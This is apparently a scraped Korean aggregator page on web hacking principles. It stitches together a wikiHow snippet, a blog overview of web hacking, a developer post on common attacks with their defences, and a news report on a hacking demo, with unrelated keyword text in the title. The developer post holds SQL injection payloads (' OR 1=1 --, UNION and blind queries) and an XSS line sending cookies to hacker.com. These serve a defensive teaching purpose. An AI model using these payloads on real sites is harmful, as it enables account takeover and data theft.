Top 33 사이트 해킹 원리 Quick Answer

You are looking for information, articles, knowledge about the topic nail salons open on sunday near me 사이트 해킹 원리 on Google, you do not find the information you need! Here are the best content compiled and compiled by the Toplist.maxfit.vn team, along with other related topics such as: 사이트 해킹 원리 사설 도박사이트 해킹, 웹사이트 해킹하는법, 사이트 해킹 프로그램, 웹사이트 어드민 해킹, 불법 사이트 해킹 사례, 사이트 해킹 기초, 블랙해커 사이트, 웹사이트 포인트 조작

webhacking.kr 회원가입 [쉽게 배우는 웹 해킹 기초 문제 풀이]

웹사이트 해킹하는 방법 – wikiHow

Article author: ko.wikihow.com
Reviews from users: 16902 Ratings
Top rated: 3.3
Lowest rated: 1
Summary of article content: Articles about 웹사이트 해킹하는 방법 – wikiHow 웹사이트 해킹하는 방법. 어떤 사람들은 모든 해커들은 나쁜 의도를 갖고 있을 것이라 생각하지만 이는 사실이 아니다! “화이트 햇”이라 불리는 해커 집단은 기업 보안 … …
Most searched keywords: Whether you are looking for 웹사이트 해킹하는 방법 – wikiHow 웹사이트 해킹하는 방법. 어떤 사람들은 모든 해커들은 나쁜 의도를 갖고 있을 것이라 생각하지만 이는 사실이 아니다! “화이트 햇”이라 불리는 해커 집단은 기업 보안 … 웹사이트 해킹하는 방법. 어떤 사람들은 모든 해커들은 나쁜 의도를 갖고 있을 것이라 생각하지만 이는 사실이 아니다! “화이트 햇”이라 불리는 해커 집단은 기업 보안 시스템의 약점을 알아내고 이에 대해 경고해주는 역할을 한다. 또한 어떤 해커들은 자신의 비즈니스용 웹사이트를 더 강화시키고 정보를 보호하기 위해 해킹을 하기도 한다. 이 글에서는 “좋은” 해커가 되기 위한 두 가지 해킹 방법에 대해 설명한다.
Table of Contents:

단계

팁

경고

웹해킹 개요 , 구조 기본 및 원리 ,기본적인 메타문자 등

메인페이지가 갑자기 바뀌어 있는 것을 디페이싱이라고 한다.

디페이싱을 한 홈페이지는 해커가 관리자의 권한을 획득 했다고 말하는 것 과 같다.

요즘 해커들은 돈을 위해 디페이싱을 하지 않고 취약점을 이용하여 악성코드를 받게 만든다.

홈페이지 변조 사고처리 현황을 보면 사고처리를 신고하지 않는다.

홈페이지가 해킹을 당해서 개인정보가 빠져나가면 사람들이 회원탈퇴를 하던가, 집단 소송을 거는 경우가 있어서 요즘에는 해킹을 당해도 신고를 하지 않는 경우가 많다.

해킹을 당한지도 모르는 상태의 홈페이지가 더 많다. 실제 신고를 한 회사의 대다수는 국가의 사이트이거나 외부에서 해킹을 당한 것을 알려준 경우에 신고를 하게 된다.

www.zone-h.com

위 사이트는 웹해킹을 한 곳을 해커들이 자랑하기 위해 올리는 사이트이다.

별이 없는 곳은 특정한 기업을 뚫었을때 올리는 곳이다.

별이 있는 곳은 특정한 국가 홈페이지를 뚫었을때 올리는 곳이다.

Web Applocation은 해커들의 공격으로부터 무방비 상태이다.

최근들어 발생하는 모든 Hacking 중 75% 이상이 Web Application의 취약성을 악용한 공격이다.

Web Application 계층의 공격은 방화벽, 침입 탐지 시스템, 침입차단 시스템 등으로 방어할 수 없다.

e-business를 위해서 80포트는 오픈될 수 밖에 없다.

Web Application 계층의 악의적인 공격은 24/365 운영되어야 하는 Web Service를 중단시킬 수 있다.

Why?

-대부분의 정보시스템을 Web으로 구축 : Business 중심축

어디서나 손쉽게 접속하여 정보나 지식을 확인 할 수 있기 때문에 편의성 때문에 web으로 구축하게 된다.

-Web Program 지식의 일반화 : 많은 교육 기관 및 풍부한 예제

코딩이나 웹디자인관련된 여러 학원과 학교가 생기면서 다양한 예제들이 나오는데 그 중 하나의 예제가 좋다는 소문이 나게 된다고 하자, 너도나도 그 예제를 사용할 것이고 그 예제의 취약점이 존재하게 된다면 , 그 예제를 사용한 프로그램들은 전부 해당 취약점이 존재하게 된다.

-Web Hacking 기술의 보편화 : 손쉬운 Hacking 도구 및 관련 자료

인터넷에 웹 해킹 툴이라고 검색만 해 봐도 관련자료 및 도구들이 많이나온다.

-정보시스템 개발 시 보안 고려사항 미 반영

웹 디자인이나 개발을 할 때 예쁘게 만드는 방법, 빠르게 접속이 되게 하는 방법 등만을 고려하기 때문에 해킹에 취약함

-운영 노하우 부족 – WAS(Web Application Server) 설정 미흡

방화벽이 각 회사에 한 두개 정도는 들어 있다. 하지만 그 방화벽이 기본 설정만 되어있고 업데이트 라던가 관리가 전혀 안 되어 있다.

-시스템 기능 구현을 중시한 개발 : 촉박한 개발 일정

개발 일정이 촉박하다면 해당 개발 일정을 맞추기 위해 보안 쪽은 신경을 쓸 수가 없게 된다.

정의

Web brower

-IE, Firefox, Opera, Netscape

Request message를 작성하여 웹 서버에 전달하고, 웹 서버로 부터 전달받은 Response message를 해석하여 사용자에게 보여주는 소프트웨어

www

-인터넷에서 이루어지는 서비스 중 하나, 정보 공유의 목적으로 개발.

정보 공유의 목적으로 개발.

유럽 물리학자 팀 버너스 리에 의해 고안

HTTP를 사용

Server/Client 기반

초기에는 클라이언트에서 요청한 문서를 서버에서 보내주기만 했다.

데이터베이스

용자가 늘어남에 따라 데이터의 크기도 커지게 되었고, 큰 데이터를 효율적으로 관리하기 위해서 도입

HTTP

-웹 서버와 웹 브라우저간의 문서교환을 하기 위한 통신규약

웹 상에서 정보를 주고 받을 수 있는 프로토콜

hyper text를 전달하기 위해 만들어진 프로토콜

(hyper text : 링크 정보를 비순차적으로 검색)

TCP 80 Port를 사용(https:443)

text 기반이며, binary가 아니다.

암호화 되지 않은 평문 전송 -> sniffing 에 취약함

★★★★★TCP를 사용하지만 연결지향적 성격을 버렸다.★★★★★

Web Application

-브라우저 등을 통해 접근할 수 있는 응용프로그램

HTTP에서 동작되는 프로그램이라고 칭할 수 있다.

ASP, JSP, PHP, ASPX와 같은 확장자를 가진 파일 단위.

네이버 서버에 로그인을 하게 되면 네이버 서버에서 ID/PW를 검증을 한번 하고나서 쿠키를 해당 사람에게 발급 해 주고 연결을 끊는다.

후에 메일을 누르게 되면 쿠키값을 확인하고 나서 메일을 보여준다.

자원 상의 문제 때문에 서버에서는 연결을 항상 끊게 된다.

쿠키 – 해당하는 사이트에서 사용 가능한 주민등록증.

URL 메타 문자

메타 문자 : 특정한 문자에 특정한 기능을담은 문자.

? : Parameter를 넘겨줄 때 사용

& : Parameter 구분자

= : Parameter 전달자

% : Hex 값으로 표현

+ : 공백 문자

웹 개발을 위해 꼭 알아야하는 보안 공격

이번 포스팅에선 아주 중요하지만 프로그래밍 교육 과정에서 크게 다루지 않는 보안에 대해 이야기 해보려고 한다. 최근엔 프레임워크나 라이브러리 차원에서 잘 막아주기 때문에 큰 언급없이 넘어가는 경우가 많지만 소프트웨어 개발자는 꼭 보안 전문가가 아니더라도 기초적인 공격 방법에 대해 이해하고 방어하는 방법을 알아야 할 필요가 있다.

사례를 들어보자면 필자가 고등학생이던 시절 웹하드 서비스의 어드민 계정을 SQL Injection을 이용하여 탈취하는 데 성공했다는 얘기를 교내에서 심심찮게 들을 수 있었고 실제로 본 적도 있었다. 이처럼 보안에 대한 기본적인 상식이 없다면 고등학생도 할 수 있는 아주 간단한 공격에도 손쉽게 뚫린다.

특히 어느정도 궤도에 오른 서비스는 작정하고 덤비는 해커부터 재미로 공격해보는 해커까지 꽤 자주 해킹 시도를 받는다. 보안이란 것은 아주 단순한 부분이라도 실수한다면 쉽게 뚫리기 때문에 예상치 못한 큰 피해를 입을 수 있다. 과장해서 표현하자면 내가 짠 코드로 인해 서비스가 한 순간에 망할 수도 있다.

한 순간의 실수로 서비스가 망할 수도 있다! 😨

하지만 너무 겁먹지 않아도 괜찮다. 요즘은 프레임워크를 이용하여 개발자의 실수를 잘 막아주고 만약 실수할 일이 생기더라도 이번 포스트를 통해 기초적인 상식을 익히고나면 금새 알아차릴 수 있을거라 생각한다. 그러니 만약 웹 보안에 대해 잘 모른다면 이번 기회에 웹 개발자들이 상식으로 알아야할 웹 해킹 기법에 대해서 알아보도록 하자.

웹 해킹

웹 사이트의 취약점을 공격하는 기술적 위협으로, 웹 페이지를 통하여 권한이 없는 시스템에 접근하거나 데이터 유출 및 파괴와 같은 행위를 말한다. https://ko.wikipedia.org/wiki/웹_해킹

웹 사이트의 취약점을 공격하는 방법은 굉장히 많다. 이번 포스트에선 그 중 중요하고 자주 사용되는 공격에 대해서 알아볼 것이다.

SQL Injection

XSS

CSRF Attack

File Upload Attack

Command Injection

…

SQL Injection

보통 웹 해킹을 접한다면 가장 먼저 배우는 공격 기법이다. 그만큼 간단하고 적용하기도 쉽지만 아주 강력한 공격이다. SQL Injection은 서버에서 실행되는 SQL을 악의적으로 이용하는 공격이다. 이름처럼 기존 SQL에 악의적인 SQL 구문을 삽입하여 데이터 탈취, 삭제 등을 할 수 있다. 그렇기 때문에 뚫리면 서비스 종료각이 나온다.

사실 요즘은 대부분의 SQL 지원 라이브러리에서 SQL Injection을 방어해준다. 그렇지만 프레임워크 없이 쌩 PHP, JSP를 자주 사용하던 시절엔 꽤 자주 발생하는 사고였다. 다음과 같은 PHP 코드가 있다고 가정해보자.

$username = $_POST [ ‘username’ ] ; $password = $_POST [ ‘password’ ] ; $mysqli -> query ( “SELECT * FROM users WHERE username=’ { $username } ‘ AND password=’ { $password } ‘” )

아주 단순한 코드다. 위 코드를 간단히 설명하자면 POST 요청을 통해 파라메터로 전달 받은 username 과 password 를 각각 변수에 대입한 후 MySQL 드라이버를 통해 쿼리를 보내는 로직이다. 이 때 주의깊게 봐야하는 부분은 쿼리에서 String interpolation 하는 부분이다. 아무 문제 없어보이는 이 String은 사실 엄청난 보안 허점이다. 만약 다음과 같이 데이터가 전달되었다고 가정해보자.

$username = $_POST [ ‘username’ ] ; $password = $_POST [ ‘password’ ] ; $mysqli -> query ( “SELECT * FROM users WHERE username=’ { $username } ‘ AND password=’ { $password } ‘” )

만약 username 과 password 가 각각 문자열 admin 과 password’ OR 1=1 — 로 들어왔다면 아래 쿼리는 SELECT * FROM users WHERE username=’admin’ AND password=’password’ OR 1=1 –‘ 로 구성된다. OR 1=1 이 추가되었기 때문에 패스워드가 틀리더라도 해당 쿼리는 True 를 반환한다. 만약 방어가 되어있지 않다면 쉽게 타인의 계정으로 로그인 할 수 있게된다.

사실 방어는 그렇게 크게 어렵지 않다. 웹 보안에서 가장 중요한 부분이 문제가 될 수 있는 문자열을 필터링하는건데 SQL Injection도

, \t, |, #, –, & 같은 문자열을 필터링하는 것으로 쉽게 방어가 가능하다. 즉 정리하면 다음과 같다.

SQL에서 특별한 의미를 가지는 문자를 이스케이프한다. ex)

, \t, | , /, &, #, …

준비된 선언을 사용한다.

준비된 선언은 조금 생소할 수 있는데 Placeholder를 넣은 쿼리를 먼저 DB에 보낸 후 Placeholder에 해당하는 데이터를 DB로 보내는 방법이다. 이를 통해 SQL Injection을 방어할 수 있다.

SQL Injection은 앞서 소개한 방식 외에도 다양한 공격 방법이 있다. 앞서 소개한 방어 방법으로 막을 수 있지만 일단 알아두자.

Error based SQL Injection 일부러 SQL 에러를 발생시켜서 원하는 정보를 취득하는 공격 기법이다. 에러가 발생하면 DB에 대한 정보를 단편적으로 얻을 수 있게 되므로 에러 메시지가 노출되지 않도록 조심해야한다.

Blind SQL Injection 쿼리 결과의 참/거짓 정보를 보고 원하는 정보가 존재하는지 추론할 수 있다. 이를 통해 데이터베이스, 테이블, 컬럼 명을 파악할 수 있다. SELECT * FROM users WHERE user_id = ‘1’ and substring ( database ( ) , 1 , 2 ) = ‘us’

Union SQL Injection Union 명령을 이용해서 정보를 취득할 수 있다. SELECT * FROM users WHERE user_id = ‘1’ or 1 = 1 UNION SELECT ” , id , pw from users

위 세 가지 공격 방법에 대한 치트 시트가 존재한다. 조금 더 자세히 알고 싶다면 이 링크를 확인해보자.

주의 할 점

프레임워크나 라이브러리에서 이스케이핑을 통해 방어해주더라도 무작정 신뢰할 수는 없다. 혹시 모를 사고에 대비하기 위해 추가적인 작업을 할 수 있다.

파라미터 Validation

apache-scalp와 같은 공격 로그 분석 툴을 사용한다.

Cross-Site Scription (XSS)

웹 페이지에 악성 자바스크립트를 삽입하는 공격이다. 이 공격을 이용하면 사이트 이용자의 정보를 손쉽게 탈취할 수 있다. 아주 간단한 사례를 살펴보면 사용자가 입력할 수 있는 게시판 같은 페이지에 자바스크립트 코드를 입력하는 것이다.

만약 필터링이 안된다면…

공격 방법은 단순하지만 아주 효과적이다. 최근엔 SPA(Single-Page Application)로 배포되는 서비스가 많은데, 인증 관리를 위해 토큰은 Cookie 혹은 localStorage 에 저장하는 경우가 많다. 이때 XSS 방어 준비가 되어있지 않은 경우 자바스크립트를 통해 불특정 다수의 사용자 토큰을 손쉽게 탈취 할 수 있다. 위 사진을 보면 document.URL = ‘http://hacker.com?cookie’+document.cookie 를 통해 해커 사이트에 쿠키 정보를 전달하는 것을 확인 할 수 있다.

SQL Injection처럼 XSS도 필터링을 통해 쉽게 방어할 수 있다. 다음과 같이 꼼꼼하게 방어하자.

서버에 데이터를 저장할 때 HTML 필터링을 한 후 데이터베이스에 저장한다.

ex) <, >, script, style, &, /, …

ex) <, >, script, style, &, /, … 후술할 Reflected XSS 나 DOM Based XSS 공격 방어를 위해 서버에서 파라미터 검증을 한다.

나 공격 방어를 위해 서버에서 파라미터 검증을 한다. 혹시나 모를 상황에 대비하여 프론트엔드에서도 필터링이 필요하다.

앞서 소개한 공격 방법은 Stored XSS라고 부른다. 다른 유명한 공격 방법은 Reflected XSS와 DOM Based XSS가 있다. 아마 Stored XSS은 너무 유명해서 많은 개발자들이 이미 알고 있었을 것이라 생각한다. 하지만 나머지 두 공격은 잘 모르는 개발자들이 꽤 있다.

Reflected XSS는 이름처럼 입력을 그대로 브라우저에 출력하는 로직을 공격하는 방법이다.

위 사진을 보면 파파고에서 번역할 내용에 스크립트 태그를 적용했다. 이때 그대로 입력한 스크립트가 우측 박스에 노출된다. 만약 파파고가 XSS에 대한 대비를 안했다면 그대로 스크립트가 실행됐을 것이다. 파파고는 번역을 누르면 외부 공개가 가능한 링크가 생성되는데 해커는 해당 링크를 불특정 다수에게 클릭하도록 공유할 수 있다. 사용자가 해당 링크를 클릭하면 바로 해킹 위협에 노출되는 것이다. 해당 링크

Reflected XSS는 서버 파라미터 검증과 프론트엔드 필터링을 통해 방어할 수 있다. 만약 스크립트를 실행시키는 파라미터 값이 들어온다면 적절히 필터링하면 된다. <, >, &, / 와 같은 문자를 < 같은 특수문자 코드로 바꾸고 Redirect하는 것을 추천한다. 그런데 요즘은 브라우저가 알아서 잘 막아준다. 그래도 구형 브라우저를 쓰거나 지원 안하는 브라우저를 쓸 수도 있으니 방심하지는 말자. 다음으로 DOM Based XSS는 서비스의 스크립트를 이용하여 DOM에 악의적인 스크립트가 노출되도록 공격하는 방법을 말한다. Reflected XSS와 유사해보이지만 서버를 타지않고 DOM을 조작할 수 있기 때문에 문제를 찾기 힘들다는 문제가 있다. 만약 base64 to image 서비스를 하는 위 사이트에서 XSS 필터링이 안됐다면, 그리고 공유가 가능했다면 XSS 취약점이 있는 샘이다. (실제로는 잘 막혀있고 브라우저 차원에서도 막아준다) 사실 XSS는 필터링만 잘하면 쉽게 막을 수 있는 공격이다. 특히 요즘은 프레임워크와 브라우저가 XSS 필터링을 통해 웬만한 공격은 막아주기 때문에 Stored XSS만 조심해도 큰 문제는 없을 것 같다. 하지만 여러 우회 방법이 개발되고 있고 서비스가 복잡해지는 만큼 XSS 취약점이 드러날 확률이 높다. 아주 조금의 틈이라도 있다면 여러 우회 방법을 통해 뚫릴 수 있으니 조심하자. 주의 할 점 최근엔 React나 Vue.js와 같은 프론트엔드 프레임워크, 라이브러리를 사용하여 XSS에 대한 방어가 어느정도 자동화된다. 그럼에도 불구하고 사용자의 실수로 취약점이 드러날 수 있다. 예를 들어, React에서 다음과 같은 실수를 할 수 있다. dangerouslySetInnerHTML 속성을 사용한다. 속성을 사용한다. href 를 통한 XSS 공격 허용 React는 문자열 변수를 자동으로 이스케이핑해주기 때문에 웬만하면 문제가 되지 않는다. 하지만 dangerouslySetInnerHTML 속성을 사용하면 문자열에 HTML 태그가 있더라도 그대로 출력하기 때문에 위험하다. 꼭 사용해야 한다면 절대로 사용자 입력이 들어올 수 없도록 조치하거나 자바스크립트 코드가 존재하는지 검증이 필요하다. 이어서 외부 웹 페이지에 접속하기 위해 각 프레임워크가 제공해주는 Router가 아닌 앵커 태그를 쓸때가 있다. 앵커 태그의 href 속성은 XSS 처럼 자바스크립트 프로토콜을 사용하여 스크립트를 실행시킬 수 있다. 이를 막기 위해서 href 속성에 들어가는 값은 추가적인 필터링이 필요하다. 필터링에는 블랙리스트와 화이트리스트가 존재하는데 이 경우 화이트리스트를 통한 필터링을 추천한다. 다음과 같이 컴포넌트를 만들 수 있다. 코드 출처

import React , { Component } from ‘react’ import ReactDOM from ‘react-dom’ import URL from ‘url-parse’ class SafeURL extends Component { isSafe ( dangerousURL , text ) { const url = URL ( dangerousURL , { } ) if ( url . protocol === ‘javascript:’ ) return false if ( url . protocol === ” ) return false return true } render ( ) { const dangerousURL = this . props . dangerousURL const safeURL = this . isSafe ( dangerousURL ) ? dangerousURL : null return < a href = { safeURL } > { this . props . text } } } ReactDOM . render ( < SafeURL dangerousURL = " javascript: alert(1) " text = " Click me! " /> , document . getElementById ( ‘root’ ) )

CSRF Attack

Cross-Site Request Forgery라고 부른다. 공격자가 서비스 사용자를 이용하여 요청을 보내는 공격을 말한다.

예를 들어 네이버 로그인과 똑같은 화면을 제공하는 피싱 사이트가 있다고 가정해보자. 여기서 사용자가 피싱 사이트인 것을 모르고 아이디와 비밀번호를 입력하고 로그인 버튼을 누른다면 피싱 사이트는 진짜 네이버 로그인 URL에 요청할 수 있다. 만약 CSRF 취약점이 있다면 성공/실패 Response가 내려올 것이다. 이를 이용하여 해커는 계정 정보를 저장하고 진짜 사이트로 이동시킨 후 모른척 할 수 있다. 이러면 사용자는 해킹당했다는 사실조차 모를 수 있다.

과거 2008년엔 CSRF 취약점을 이용해서 옥션 사용자 개인정보를 유출했다고 한다. 이 사례는 CSRF 공격 코드가 포함된 이메일을 관리자에게 보내 관리자 권한을 탈취했다고 한다. 이처럼 간단한 공격인 것 치고 아주 치명적인 공격이다.

공격이 쉬운 만큼 방어도 꽤 쉬운편에 속한다. 대표적으로 다음 세 가지 방법이 있다.

Referer Check HTTP Referer를 확인하여 허용된 Referer의 요청만 허락하도록 설정하는 방어 방법이다. 단, HTTP 변조를 통해 쉽게 뚫을 수 있으므로 추천하지 않는다.

CSRF Token 모든 요청에 토큰을 발급하여 서버에서 검증하는 방어 방법이다. 발급된 토큰을 서버로 전달하지 않으면 요청이 허락되지 않기 때문에 효과적이다.

CAPTCHA 캡챠는 사람이 요청한 것이 맞는지 검증하는 방법이지만 CSRF 공격에도 효과적이다. 사실상 CSRF Token이 하는 것과 똑같고 겸사겸사 로봇 여부 확인도 가능하다.

Command Injection

Command Injection은 쉘을 실행시키는 로직을 이용한 공격이다. 시스템 권한이 탈취되는 것이나 마찬가지기 때문에 매우 치명적이다.

WebShell이 열린거나 마찬가지

각 언어마다 쉘 명령을 실행시키는 함수가 존재한다. 예를 들어, Java의 System.runtime() 이나 Runtime.exec() , Python의 exec() , os.system() 등이 있다. 마찬가지로 각 언어마다 존재하는 eval() 함수도 매우 취약하다.

위 사진을 보듯 쉘 명령을 실행시키는 함수를 이용하여 악성 명령을 삽입 할 수 있게 되면 사실상 해커를 위한 WebShell이 된다. 이때부턴 해커들의 잔치가 시작된다. 아마 나라면 바로 방화벽부터 풀지 않을까?

여담으로 이 공격에 성공했다면 흔히 뉴스에서 접할 수 있는 Deface Attack을 할 수 있다.

조금 다르지만 이것도 Deface의 일종이다

Deface 공격은 해킹에 성공했음을 과시하는 방법이다. 서버에 존재하는 파일을 변조해야 하기에 Command Injection을 이용하면 손쉽게 해낼 수 있다.

Command Injection 공격의 방어 방법은 매우 간단하다. 쉘 명령을 실행시키는 시스템 함수를 사용하지 않는 것이다. 만약 꼭 사용해야한다면 |, &, ;, >, < 와 같은 민감한 문자는 필터링하도록 하자. File Upload Attack 공격 스크립트가 담긴 파일을 서버로 업로드하는 공격이다. WebShell이 가능한 코드가 담긴 파일을 업로드하고 해커가 URL을 통해 접근 가능해지면 Command Injection과 같은 효과를 볼 수 있다. 해커가 개발 언어에 따른 공격 스크립트를 업로드하는데 성공하고 해당 파일을 브라우저로 접근 할 수 있다면 Command Injection처럼 WebShell 접근이 가능하다. 꼭 PHP, JSP와 같은 스크립트가 아니더라도 CSRF Attack을 유발시킬 수 있는 파일을 업로드할 수도 있다. 방어 방법은 다음 절차를 모두 따르는 것이 좋다. 확장자와 파일 타입을 검사하여 허락된 타입만 저장한다. 해커가 파일을 찾을 수 없도록 업로드 파일의 이름과 확장자를 난수화하여 저장한다. 특수 문자가 포함된 경우 업로드를 막는다. (Null byte Injection 방지) 요즘은 클라우드 서비스가 제공해주는 파일 스토리지를 이용하기도하고 프레임워크에서 제공해주는 기능을 쉽게 이용할 수 있어서 예전보다 막기 쉬워졌다. 주의 할 점 HTTP는 조작될 수 있으므로 Content-Type 을 믿지 않는 것이 좋다. 그리고 꼭 WebShell을 하기 위한 공격이 아닌 서버 자체를 죽이기 위해 대용량 파일을 계속해서 보낼 수도 있다. 이를 막기 위해 파일 크기 제한도 설정하자. 그리고 가급적 같은 서버가 아닌 파일 서버를 별도로 두는 것을 추천한다. JavaScript Injection 브라우저에서 자바스크립트를 삽입시키는 공격이다. 브라우저에서 제공하는 Console을 통해 조작 가능하다. 만약 Client-Side에 민감한 데이터를 넣어놨다면 해당 공격을 통해 탈취가 가능하다. 아주 간단한 JavaScript Injection 사례 사실 위 사진처럼 브라우저를 통해 언제든지 자바스크립트 명령어를 실행시킬 수 있기 때문에 클라이언트에 민감한 데이터를 넣는건 자살행위다. 또한 데이터가 아니더라도 클라이언트에서 로직을 결정하는 경우 함수 변조도 가능하기 때문에 가급적 서버에서 결정하도록 수정해야한다. 예를 들어, 웹 게임에서 수치를 JavaScript Injection을 통해 변경하고 저장하는 로직을 변경하면 손쉽게 1등을 할 수도 있다. 이를 방지하기 위해선 서버에서 검증하는 로직이 필요하다. 위 사례에서 설명했던 것 처럼 다음 두 가지 방어 절차를 따르는 것이 좋다. 클라이언트엔 민감한 데이터를 절대 Plain하게 넣지 않는다. 데이터 유효성 검사가 필요한 경우 서버에서 처리하도록 한다. DDoS Distributed Denial of Service라고 부른다. 직역하면 분산 서비스 거부 공격이 된다. 그 이름처럼 분산된 시스템을 이용하여 서버에 비정상적으로 많은 트래픽을 보내 마비시키는 공격이다. 수 많은 PC를 이용해 공격한다 공격자는 수 많은 PC를 이용하여 서버에 트래픽을 보낸다. 이때 몰래 심어놓은 좀비 PC를 이용할 수도 있고 본인이 사용할 수 있는 PC를 이용할 수도 있다. 많은 트래픽이 발생하면 서비스에 부하가 생겨 느려지거나 서버가 죽을 수 있다. DDoS는 제일 단순한데 제일 막기 힘든 공격이다. 그나마 예방하기 위해선 다음과 같은 것들을 고려할 수 있다. 당장 서버가 죽지 않도록 확장 가능한 분산 시스템을 설계한다. 공격 IP를 필터링한다. 서비스 지역 외의 IP를 막는다. DDoS를 막아주는 전문 업체의 솔루션을 구매한다. Dictionary Attack 미리 데이터베이스에 등록해놓은 수많은 문자열을 암호로 대입하는 공격이다. Brute Force의 일종이다. 미리 등록된 문자열로 무작정 대입한다 하나만 걸려라 공격이라고도 볼 수 있다. 많은 웹 사이트에서 간단한 단어로 비밀번호를 등록하지 못하게 하는 이유기도 하다. 이 공격을 막기 위해선 의미가 있는 간단한 단어는 비밀번호로 등록하지 못하게 막는 것이 좋다. 그 다음 선택으로는 Account Lockout Policy 를 도입하여 몇 회 이상 로그인에 실패할 경우 계정을 잠그거나 OTP 같은 2-factor 인증을 도입할 수 있다. Rainbow Table 평문을 해시 함수로 만든 문자열을 모두 저장시켜 놓은 표를 말한다. 주로 계정 데이터 탈취 후 암호 원문을 알아내기 위해 사용한다. https://ko.wikipedia.org/wiki/레인보_테이블 쉽게 안뚫리기 위해서 다음과 같은 방법을 이용할 수 있다. Salt 사용 Key Stretching PBKDF2, BCrypt 등의 암호화 알고리즘 사용 (위 두 가지가 포함된다) 모의해킹 사이트 웹 해킹을 직접 해볼 수 있는 여러 사이트, 프로젝트가 존재한다. 사실 필자가 경험해본 사이트는 webhacking.kr 뿐이다. 과거엔 어두운 배경이었는데 사이트 관리자가 바뀌고나서 디자인도 바뀐 듯 하다. 마치며 해킹은 뭔가 멋있지만 어려운 것이라고 느끼는 개발자가 많다. 하지만 공격을 막는 입장에서 본다면 방어는 생각보다 간단하는 것을 알 수 있다. 만약 필자처럼 소프트웨어를 만드는 개발자라면 무리해서 해킹 기법을 익힐 필요는 없다. 그런 일은 더 뛰어난 보안 전문가가 해줄 것이다. 그럼에도 불구하고 우리가 만든 소프트웨어를 지키기 위해 최소한의 상식을 익혀두고 방어하는 것은 좋다고 생각한다. 필자가 생각하기에 마음가짐 세 가지만 기억한다면 충분하다. 외부 요청은 모두 의심하자. 특수문자 필터링은 매우 중요하다. 프레임워크, 라이브러리, 브라우저가 잘해주지만 무작정 믿지는 말자. 추가로 보안에 대해서 더 알고 싶다면 https://owasp.org/에서 여러 사례를 읽어볼 수 있다. 그리고 OWASP에서 제공하는 치트 시트도 있으니 다양한 공격 기법을 알고싶다면 해당 문서도 읽어보자.

웹사이트 해킹, 기자가 직접 해봤다

SSL 인증서 도입 및 HTTPS 적용 필요
[파이낸셜뉴스] “아이디와 비밀번호를 임의로 작성해서 로그인 해 보세요. 평소에 쓰시는 건 안됩니다.”지난 4일 경기도 판교 SK인포섹 본사에서 보안전문가그룹(EQST) 담당 김건엽 수석이 해킹 용어, 원리 등 해킹의 기본 이론에 대한 교육 세션을 진행했다.이번 교육은 지난달 국감에서 지적받은 사항을 그대로 재연한 것이다. 당시 대법원 통합관리 시스템 홈페이지, 국방부 군무원 채용관리 시스템 등 정부부처 웹사이트가 일반인이 누구나 내려받을 수 있는 해킹 프로그램 설치로 아이디와 비밀번호를 알아낼 수 있어 논란이 된 바 있다.실제 기자는 기본적인 컴퓨팅 지식이 일반인보다 더 부족한 편이었지만 김 수석의 지도하에 차례차례 몇번의 클릭과 입력만으로 다른 교육참여자가 입력한 아이디와 비밀번호를 추적하는데 성공할 수 있었다.이를 방지하기 위해서는 SSL 인증서를 도입, HTTPS 적용이 필요하다는 지적이다. 예전에는 웹사이트 주소가 HTTP로 시작하는 경우가 많았는데 요즘 공신력 있는 사이트 대부분은 HTTPS로 시작한다. HTTPS를 통한 인터넷 접속은 브라우저를 실행중인 PC가 해당 사이트의 서버와 암호화 통신을 하고 있다는 것을 의미한다. 보안 프로토콜을 통해 브라우저와 서버가 보안이 향상된 통신을 하는 것이다.김 수석은 “보통 PC 앞단에 보안 솔루션을 설치해서 악성코드 감시를 한다. 이 솔루션들은 연결된 PC들에게 보안 솔루션이 발급한 인증서를 설치한다.그러면 직원 PC에서는 좌물쇠 표시가 되며 통신 내용을 회사에서 모니터링 할 수 있다”라며 “이를 통해 정보 유출을 막을 수 있고 악성 트래픽이 발생했을 때 사이트를 차단하는 용도로 쓸 수도 있다”라고 설명했다.김영배 더불어민주당 의원은 국감에서 공공기관 웹사이트 1210개 중 48.2%인 582곳이 HTTPS보다 보안이 취약한 HTTP 사이트라고 지적했으며 이후 행정안전부는 전체 공공기관 웹사이트를 전수조사하고 HTTPS를 적용하는 등 보안을 강화하는 방안을 검토키로 했다.김 수석은 “기업에선 웹사이트에 SSL 인증서 도입 및 HTTPS 적용을 통해 해킹을 당하더라도 이용자의 통신내역이 암호화 돼 확인할 수 없게 만드는 조치가 필요하다”라며 “일반 사용자 역시 2차 인증 서비스 등을 사용해 개인정보 유출을 막는 노력이 필요하다”고 말했다.

※ 저작권자 ⓒ 파이낸셜뉴스, 무단전재-재배포 금지

So you have finished reading the 사이트 해킹 원리 topic article, if you find this article useful, please share it. Thank you very much. See more: 사설 도박사이트 해킹, 웹사이트 해킹하는법, 사이트 해킹 프로그램, 웹사이트 어드민 해킹, 불법 사이트 해킹 사례, 사이트 해킹 기초, 블랙해커 사이트, 웹사이트 포인트 조작

Top 33 사이트 해킹 원리 Quick Answer

웹사이트 해킹하는 방법 – wikiHow

HTML 코드로 웹사이트 해킹하는 법: 8 단계 (이미지 포함) – wikiHow

웹해킹 개요 , 구조 기본 및 원리 ,기본적인 메타문자 등 : 네이버 블로그

웹 개발을 위해 꼭 알아야하는 보안 공격 | kciter.so

웹사이트 해킹, 기자가 직접 해봤다 – 파이낸셜뉴스

해킹 툴 사용하기(1)

‘이 사이트 해킹해주세요’··· 다크웹 내 긱 이코노미 부상 중 – CIO Korea

‘이 사이트 해킹해주세요’··· 다크웹 내 긱 이코노미 부상 중 – CIO Korea

웹해킹 개요 , 구조 기본 및 원리 ,기본적인 메타문자 등

웹 개발을 위해 꼭 알아야하는 보안 공격

웹사이트 해킹, 기자가 직접 해봤다

Leave a Comment Cancel reply